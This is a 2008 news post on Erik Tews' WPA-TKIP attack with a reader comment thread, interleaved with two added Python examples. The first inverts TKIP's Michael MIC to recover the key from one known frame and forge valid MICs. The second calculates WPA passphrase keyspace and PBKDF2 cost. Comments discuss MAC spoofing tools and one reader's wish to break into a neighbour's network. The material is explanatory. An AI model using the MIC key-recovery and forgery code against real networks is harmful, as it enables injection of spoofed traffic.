WPA cracked in 15 minutes or less, or your next router's free
They always knew it could be done; that a hacker with enough time and processing power could watch your WPA-protected wireless network and, eventually, decrypt your precious data. In under 15 minutes, though? "Inconceivable!" those hypothetical security experts would say -- but they're about to get a lesson from WiFi wizard Erik Tews. He'll be giving a presentation next week at the PacSec Conference in Tokyo, describing the "mathematical breakthrough" that, he says, enables him to crack WPA-TKIP in 12 to 15 minutes. There are some limitations: the data sent from a connected device to the compromised router is apparently still safe, but anything headed the other way, from the router to the client, is wide open, and could even be supplanted by bogus bits sent from a Cheetos-munching hacker slouching in a rusty Ford Taurus in the parking lot. Don't believe us? Tews was the guy able to crack WEP in under a minute last year, advising people at the time to switch to WPA ASAP. We can only assume WPA2 is next.
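The "bogus bits" part of that story rests on a property of TKIP's integrity check, Michael, that the attack exploits: Michael is a keyed but invertible function, so an attacker who learns the plaintext of one frame and its 8-byte MIC can run the function backwards and recover the MIC key, then compute valid MICs for frames of his own. The example below is added here and is not code from the talk or from any tool; it implements Michael from the 802.11i description (key and MIC as two little-endian 32-bit words, 0x5a padding) and the inverse walk. It assumes the caller has already prepended TKIP's pseudo-header (DA, SA, priority, three zero bytes) to the payload, and the sample message and key are constructed for illustration. Recovering the frame plaintext in the first place (the chopchop-style step that makes the attack slow, because an AP rekeys after two MIC failures in 60 seconds) is not shown.

```python
# Michael MIC (TKIP) forward and inverse, pure Python 3. Added example, not the
# original article's or Erik Tews' code. Input bytes are assumed to already carry
# the TKIP pseudo-header (DA || SA || priority || 0x00 0x00 0x00) before the MSDU.
import os
import struct

MASK = 0xFFFFFFFF


def rol32(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK


def ror32(v, n):
    return ((v >> n) | (v << (32 - n))) & MASK


def xswap(v):
    # Swap the two bytes inside each 16-bit half of the word.
    return ((v & 0xFF00FF00) >> 8) | ((v & 0x00FF00FF) << 8)


def block(l, r):
    # One Michael block function: four rotate/xor/add rounds.
    r ^= rol32(l, 17); l = (l + r) & MASK
    r ^= xswap(l);     l = (l + r) & MASK
    r ^= rol32(l, 3);  l = (l + r) & MASK
    r ^= ror32(l, 2);  l = (l + r) & MASK
    return l, r


def block_inv(l, r):
    # Every step of block() is a bijection, so it can be undone in reverse order.
    l = (l - r) & MASK; r ^= ror32(l, 2)
    l = (l - r) & MASK; r ^= rol32(l, 3)
    l = (l - r) & MASK; r ^= xswap(l)
    l = (l - r) & MASK; r ^= rol32(l, 17)
    return l, r


def _pad(msg):
    # Append 0x5a and then 4..7 zero bytes so the total length is a multiple of 4.
    return msg + b"\x5a" + b"\x00" * (4 + (3 - len(msg) % 4))


def michael(key, msg):
    """8-byte Michael MIC of msg under the 8-byte key."""
    l, r = struct.unpack("<II", key)
    for (w,) in struct.iter_unpack("<I", _pad(msg)):
        l, r = block(l ^ w, r)
    return struct.pack("<II", l, r)


def recover_key(msg, mic):
    """Given one plaintext and its MIC, walk Michael backwards to the MIC key."""
    l, r = struct.unpack("<II", mic)
    for (w,) in reversed(list(struct.iter_unpack("<I", _pad(msg)))):
        l, r = block_inv(l, r)
        l ^= w
    return struct.pack("<II", l, r)


def demo():
    """Constructed scenario: attacker learns one (plaintext, MIC) pair, then forges."""
    real_key = os.urandom(8)                       # the AP->client MIC key (unknown to attacker)
    known = b"constructed: pseudo-header + decrypted ARP reply"
    mic = michael(real_key, known)                 # what the attacker observed and decrypted
    stolen = recover_key(known, mic)               # key recovery needs no brute force
    forged = b"constructed: pseudo-header + forged ARP reply"
    forged_mic = michael(stolen, forged)           # will verify at the victim client
    return stolen == real_key, forged_mic == michael(real_key, forged)


if __name__ == "__main__":
    print(michael(bytes(8), b"").hex())  # 82925c1ca1d130b8, the published all-zero-key vector
    print(demo())
```

The all-zero-key, empty-message vector `82925c1ca1d130b8` comes from the Michael specification and checks the implementation. The practical caveat is the same one the article gives: recovery only yields the key for the direction whose frame was decrypted (AP to client), and TKIP's countermeasures throttle the decryption step, which is why the time is measured in minutes rather than seconds. WPA2 with CCMP does not use Michael at all.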
...if they use a simple password.
WAG325N in the picture. Great router!
in 15 minutes, not anymore....
I thought this was old news?
I have a chinese program which takes about 3 minutes to break WEP and about 20 minutes to break WPA. It sends millions of packets to the router and recognizes the rejected packet's properties to figure out the true code.
Wow, I'm shocked. Flashpoint is a script kiddie. Who woulda thunk it?
@ Flashpoint
I guess this method reads the data being sent out and decrypts it. It's passive, he's eavesdropping and can then choose to send info.
The problem with those programs you've mentioned is that they can probably be detected.
Surely if you set up your router right, with restricted MAC addresses, these programs won't work and even this guy wouldn't be able to send you data (though he'd still be able to read what you're sending).
For an alternate method try TEMPEST (http://en.wikipedia.org/wiki/TEMPEST).
@Carpet
MAC cloning isn't a difficult task. Blocking by MAC address is useful, but not fool-proof.
---
Jeez, I hope AES lasts a while. I don't feel like having to buy a new router just because of something like this.
This building's walls are lined with lead. Good luck getting a signal, b*tch! :)
WPA2 isn't going to get cracked very easily. It uses AES as the base of its encryption and that's a lot more secure than TKIP.
""Inconceivable!" those hypothetical security experts would say..."
http://www.youtube.com/watch?v=G2y8Sx4B2Sk
No, that's not what they said. All security protocols get cracked, sooner or later. What they meant was, there was no published attack against WPA at that time, so it was inconceivable at that time. No serious security professional would ever say anything is going to be secure forever.
AlekZander, you're a bigger buzzkill than Buzz Killington.
Hello. My name is Hung Le. You killed my buzz. Prepared to be low-ranked.
Hello. My name is...
So when's the new security standard coming out? Hey, router guys?
Alright... what's the next gen of wireless security? 'Cause WPA2 is not far from dead now.
The safest way, physical wires... forego wireless if you can...
Are physical wires even safe? Wasn't it just a month ago that they figured out how to wirelessly record keystrokes from a wired keyboard because of mild electrical pulses coming off the wire? I think the only way to really be safe is to just crawl into John McCain's computerless cave and live out the rest of your life disconnected and alone.
WPA3
With the ease that WEP and WPA can be hacked, is it helpful to use MAC address filtering on your home wi-fi router? I have been using this for a while, but I don't know how much this really helps. Is it relatively easy to capture and then spoof the MAC addresses on your filter list?
actually you can see the connected computers without hacking, and of course see their mac address as well. kism@c
this part is easy.
then you can change your mac address with little tools. spoofm@c
this part is easier.
mac filtering is not safe.
MAC filtering it only useful for keeping out accidental connections. MAC addresses are easily captured and spoofed.
In all honesty if you have WPA turned on you have very little to worry about. 99% of the population wouldn't know how to hack you and the other 1% don't need to because there are easier targets.
All Mac filtering does is keep your computer illiterate neighbors from leeching. As a security measure it is worthless.
Mac addys can be spoofed, but yeah, it's an excellent way to keep your neighbor (or even someone you know, trying to get a non-approved-by-you device onto the network) off of your wifi network. The best advice here is to close down your network as much as possible. For instance, don't share the root of a drive, period, and absolutely don't share the root of a drive with a computer that is connected via wifi. Don't give write privileges to your network shares either. WPA or WPA2 are going to keep all but the most computer savvy neighbors off of your network. If you are really paranoid, encrypt your data on your HDD, so that if some script kiddy does get in, he's not getting any personal info anyway. He may be able to crack WPA, but he isn't going to crack AES 256. If you make sure your banks website (or any site you use your credit card on) is using SSL, then that data is encrypted and you don't need to worry about that anyway.
Oh, and another tip for keeping neighbors off of your Wifi, is making sure they don't get a signal. Point the signal at your devices that need it, instead of letting it send out waves in every direction (you can accomplish this with a parabolic reflector). Also, limit the number of DHCP addresses that your router can assign. If you have 3 devices total, and they are all on at all times, you only need to allow your router to give 3 IP addresses total.
Oh, and FFS, make sure your router has a secure (10+ character, numbers and letters, if not numbers letters and symbols) password. The best security can be foiled in an instant if you are using the default login of your router.
Oh, and I almost forgot, turn off announcing on your router if you haven't already done so. Basically, when a router announces its presence, anyone with a decent Wifi card can find it. Adding the extra step of having to manually enter in the name of the AP is going to keep most people off. Sure, someone could still capture packets, and eventually figure out where they are coming from, but chances are they aren't going to bother. The only problem is that you'll need to enter in the name of the AP on every computer/device/etc you need to connect via Wifi, but it's one extra security measure that most people don't use.
Problem is then the hacker can lock you out of your own network. MAC filtering is really a no-win situation with hackers. If MAC filtering's intentions are to keep out would-be computer-illiterate neighbors then use WPA, or WPA2 if you can.
pfffff mac filtering , but that wont be difficult...
"enables him to crack WPA-TKIP in 12 to 15 minutes. There are some limitations, as the data sent from a connected device to the compromised router is apparently still safe"
So he hasn't cracked WPA-TKIP at all then, if it were cracked then data in both directions would be compromised.
Until you enable packet duplication on the compromised router to send any incoming packets out to another mac, namely, that of the eavesdropper. A compromised router is just that - compromised, and all bets are off on protecting any packets coming into it.
MAC filtering is useless as MAC addresses are unencrypted, visible, and easily spoofed even using Windows.
It has been known for some time that TKIP is broken and this is why for almost 2 years I have had my clients on AES / WPA2 using a 63 character randomly generated password.
I owe everything I know about WIFI security to Security Now Podcast with Steve Gibson, he explains things far better than any course or book could.
Yep, best advice possible. WPA2 w/ AES, 63 character random password from https://www.grc.com/passwords.htm
MAC Filtering is worse then WEP for security. Same with SSID hiding. That is why I don't bother with either of them.
Only negative on the 63 character random password: real real hard to type on an iPhone.
Actually NOT using 63 chars is going to be safer - Telling people how long your password is helps them, now they know only to try 63 char passwords. Using any other length password and NOT telling the world about it is going to mean they have to test all passwords from length 1 to 62.
@FuzzyCat
You go ahead and brute force a 63 byte passphrase. Let me know how that works out after the heat-death of the universe.
Stupid advice. 63 character password is better than 62.
@Phil
The point is telling someone it's 63 chars still means they aren't wasting cpu cycles on shorter passwords. I know that brute forcing 63 chars isn't exactly quick but knowing it's 63 chars long cuts out trillions of possibilities that would still need to be tested.
Let's say you allow upper and lower case chars and digits - that gives 26+26+10 = 62 chars to try per char in the password, a 4 character password has 62 x 62 x 62 x 62 = 14,776,336 possible combinations. While these are 'short' they would still be wasting cpu cycles - KNOWING you only have to test 63 chars cuts out testing ALL of the shorter passwords - ideally you want them to have to test them all.
@Kiff
Obviously 63 chars is stronger than 62. You missed the point completely. Which do you think will take more time -
a) Brute force 63 char password
b) Brute force 1 char password, then a 2 char password, then a 3 char password, then a... etc up to 63 chars?
@FuzzyCat
That almost sounds like a good idea until you realize that there are more 63 char passphrases than 1-62 characters ones combined.
Do you think he has a sign on his door saying his password is 63 characters long? Posting here in an anon fashion is hardly a security vulnerability for him. Your argument is baseless. I think you just like to argue.
Knowing it is 63 characters does not help them at all, it still leaves them with 2.28273036 × 10^113 possible combinations, this is larger than the number of atoms in the universe. Good luck with that.
To put that number in perspective some more:
63^63 = 2.28 x 10^113 (number of codes)
Lets say you can do 3 trillion checks a second.
2.28 x 10^113 / 3000000000000 = 7.60910121 × 10^100 seconds
Now, lets convert that to years:
7.60910121 × 10^100 / 60 minutes / 24 hours / 365 days = 1.4476981 × 10^95 years
Also, remember, this is just an alpha numeric code, forgetting spaces and symbols characters which greatly add to the complexity.
hmm... its actually 62 ^ 62, but the fact remains the number is still ridiculously large
Oh, and as for my "Atoms in the universe" comment I now see its "Atoms in the OBSERVABLE universe"
http://en.wikipedia.org/wiki/Observable_universe#Matter_content
Listen to this man: "Josh @ Nov 6th 2008 1:53PM
Do you think he has a sign on his door saying his password is 63 characters long? Posting here in an anon fashion is hardly a security vulnerability for him. Your argument is baseless. I think you just like to argue."
He's mostly right. This isn't a real argument. You naysayers forget that telling someone your password length will compromise your security, REGARDLESS of length.
Let me reiterate: Telling someone your password length will compromise your security, REGARDLESS of length.
@FuzzyCat
What's going to take longer:
(a) Brute forcing a 63 character password without knowing it's 63 characters?
(b) Brute forcing one that's 8 to 62 (8 is the minimum) without knowing it's 8-62?
HOLY SHIT, IT'S FUCKING MAGIC.
WOW! A proper technical discussion on Engadget! Who'd have thought?!
*wipes the tear from his eye*
@Hung
I am not debating the fact that it will take longer if you dont know its already 63, but when its already going to take nearly 10,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000 years to brute force a 63 character password, I dont think it really matters.
This WPA crack revolves around flaws in the encryption algorithm itself, not how you choose your password.
@Paul
I'm not saying it wouldn't take a long time, I've never said that. You are of course assuming that the password isn't discovered until the very last iteration which is as likely as me being bothered to try :)
I would like to chime in.
@Fuzzycat
If they start with 63 characters and work their way down, instead of starting at 1 and working their way up. Then you lose again.
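The thread above argues about whether knowing a passphrase is 63 characters long helps a brute-force attacker, and quotes a few large numbers from memory. The script below is an added example, not something any of the commenters posted, that does the arithmetic exactly and also derives the key a WPA/WPA2-PSK network actually uses from the passphrase, so the per-guess cost is realistic: 802.11i derives the 256-bit PMK with PBKDF2-HMAC-SHA1, 4096 iterations, the SSID as salt, and passphrases may be 8 to 63 printable ASCII characters (95 symbols), which is a larger alphabet than the 62 used in the comments. The guess rate passed to `years_to_exhaust` is an assumption the reader supplies; `measure_rate` times this machine instead.

```python
# WPA/WPA2-PSK passphrase keyspace and PMK derivation cost. Added example, not
# code posted in the thread. Facts used: PBKDF2-HMAC-SHA1, 4096 iterations, SSID
# salt, 32-byte PMK; passphrase 8..63 printable ASCII characters (95 symbols).
import hashlib
import time

PRINTABLE = 95            # ASCII 0x20..0x7e
MIN_LEN, MAX_LEN = 8, 63  # passphrase length limits in 802.11i


def wpa_pmk(passphrase, ssid):
    """The 256-bit PMK that a WPA/WPA2-PSK network derives from the passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def keyspace(length, alphabet=PRINTABLE):
    """Number of passphrases of exactly this length."""
    return alphabet ** length


def keyspace_range(lo, hi, alphabet=PRINTABLE):
    """Number of passphrases whose length lies in lo..hi inclusive."""
    return sum(alphabet ** n for n in range(lo, hi + 1))


def shorter_fraction(length, alphabet=PRINTABLE):
    """Share of the 8..length search space that lengths below `length` contribute.

    This is the quantity the thread disputes: how much work an attacker saves by
    knowing the exact length instead of trying every shorter length first.
    """
    shorter = keyspace_range(MIN_LEN, length - 1, alphabet)
    return shorter / (shorter + keyspace(length, alphabet))


def years_to_exhaust(length, guesses_per_second, alphabet=PRINTABLE):
    """Worst-case time to try every passphrase of one length at a given rate."""
    return keyspace(length, alphabet) / guesses_per_second / (3600 * 24 * 365)


def measure_rate(ssid="ExampleSSID", samples=200):
    """PBKDF2 guesses per second on this machine (single core, pure hashlib)."""
    t0 = time.perf_counter()
    for i in range(samples):
        wpa_pmk("guess%08d" % i, ssid)
    return samples / (time.perf_counter() - t0)


if __name__ == "__main__":
    # Published 802.11i test vector: "password" / "IEEE"
    print(wpa_pmk("password", "IEEE").hex())
    print("fraction of work below length 63: %.4f" % shorter_fraction(63))
    rate = measure_rate()
    print("this CPU: %.0f guesses/s" % rate)
    for n in (8, 10, 12, 63):
        print("length %2d, all printable: %.3g years" % (n, years_to_exhaust(n, rate)))
    print("length 8, lowercase only, at 100k/s: %.3f years" % years_to_exhaust(8, 1e5, 26))
```

Two things the numbers show. First, the lengths below 63 add roughly one percent to the total, so announcing the length changes nothing meaningful for a 63-character random passphrase; the geometric growth means the longest length dominates. Second, the 4096-iteration PBKDF2 is what makes even short passphrases expensive per guess, but an 8-character lowercase passphrase still falls in weeks at rates a single 2008-era CPU could not reach but a handful of GPUs could, so the length and randomness of the passphrase are what matter for WPA2-PSK, whereas, as a later comment correctly notes, the TKIP attack in the article does not touch the passphrase at all.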
security...like control, is an illusion
Offense is the best defense.
The best security is common sense. Be careful what you do and how you do it because someone could be watching and no amount of encryption will ever be foolproof. If somebody wants your shit, they're going to get it.
Those crafty sewer thieves.
I thought you might be worried . . . about the security . . . of your shit.
This is why I have a trace buster tracer bust.
What if you are using WPA2 with AES? Still crackable?
My impression from the article is that WPA2 and AES hasn't been cracked yet.
I think that also means that WPA that uses AES is fine too.
AES appears to be really secure (its proper name is Rijndael), no one's yet managed to find a weakness in its method. The US government approves it for encrypting its classified documents, so don't fret too much.
That said, if a genius mathematician comes along and finds a sequence to predict prime numbers, we're all screwed as pretty much all encryption ciphers these days work on the product of prime numbers.
Not yet, but typically the problem is not so much with the algorithm itself, but the way it's implemented within a wireless network. Wireless is just inherently insecure.
Wait, isn't "What, me worry" the theme of Alfred E. Newman, the guy on the cover of Mad Magazine...? I think you (engadget) were attempting a "Cracked" reference, right?
And what chinese program is that?
I can't pronounce the Chinese characters, but on the super, super, secret site he downloaded the prog from, they translate roughly as "The Temple of Grandiose & Ignorant Posturing." Or something like that. Chinese is really hard.
In the semi-country where I live, even a WEP is overkill. Plus, my router won't reach further than my property anyways.
This entire topic is moot for most home users. More applicable to the business environment. No one is going to camp outside your house cracking your security to find out what is in your yahoo email or what your family tree has in it. People break security where there is money to be made and that is not USUALLY in the residential arena.
Sorta... When I go on vacation and I need an internet connection I have been known to drive around looking for an open WiFi connection, I can see people with WEP / WPA cracking tools doing the same thing but more maliciously.
@ Josh
Unless you're Sarah Palin!
>>He'll be giving a presentation next week at the PacSec Conference in Tokyo, describing the "mathematical breakthrough" that, he says, enables him to crack WPA-TKIP in 12 to 15 minutes.
>>enables him to crack WPA-TKIP in 12 to 15 minutes.
>>WPA-TKIP
>>TKIP
That's fine. Wake me up when he can crack WPA-AES.
OMG
I just hope this guy can publish this, so I can finally f**** my neighbour's wpa-tkip wifi. I must work from home lol
Looks like we'll all just have to start Quantum encrypting all our routers now...
Come on Physicists, get us a market solution!
p.s. I put quantum in capitals because it's just that cool a word.
Which leads to wireless routers packing more of a grunt, and in turn being hacked into actually doing something useful.
The problem with random 63 character passwords is that you are enforcing a "write it on a post-it note" policy. The point about announcing the length of the key is a valid one, but 64 factorial = a lot of brute forcing.
As usual the issue with the migration to wpa2 is that your older wireless devices may not support it. I am talking TiVos, phones and Nintendo DSs. You can set up two wireless networks if you have to....
I haven't played with the new code, it looks like the shared session secret is discovered, only individual tkip sessions...? Maybe.
Man, it's time to change my password. When I originally had my router setup (WPA-AES) I gave it a 63 key but for some reason it wouldn't jive with my PS3 so I just changed it to "88888888". Someone is probably stealing my internetz right now.
Banana- Are you serious? MAC addy's? Must every term be abbreviated or have a nickname? I'll add that to the list with Sammy and Panny...
Folks, I don't think they are talking about cracking TKIP-PSK passphrases. Getting your hands on a passphrase will get you network access, but will NOT allow you to sit and monitor your neighbors actual packets traveling the airwaves, those are still encrypted. What Tews seems to be suggesting is that he is able to easily crack encryption on outbound packets heading from a WAP to an associated client. This is a big step up from simply gaining network access, Tews can now packet sniff your encrypted data.
Death to script kiddies.
"Back in '82"
Geez, WEP and WPA-PSK have been cracked since 2004/2005. Why is this so much hype?
http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
http://blogs.zdnet.com/Apple/?p=65
http://www.informit.com/articles/article.aspx?p=369221
JMan, read my post above yours. This isn't an announcement that Tews has found a way to steal the PSK passphrase ... he has actually cracked part of the encryption on individual link layer frames, so he can read the information traveling the radio waves and packet sniff them... that's much more significant than simply getting a passphrase. So instead of just getting free internet, malicious users could now sit and read your personal data you just sent in an email.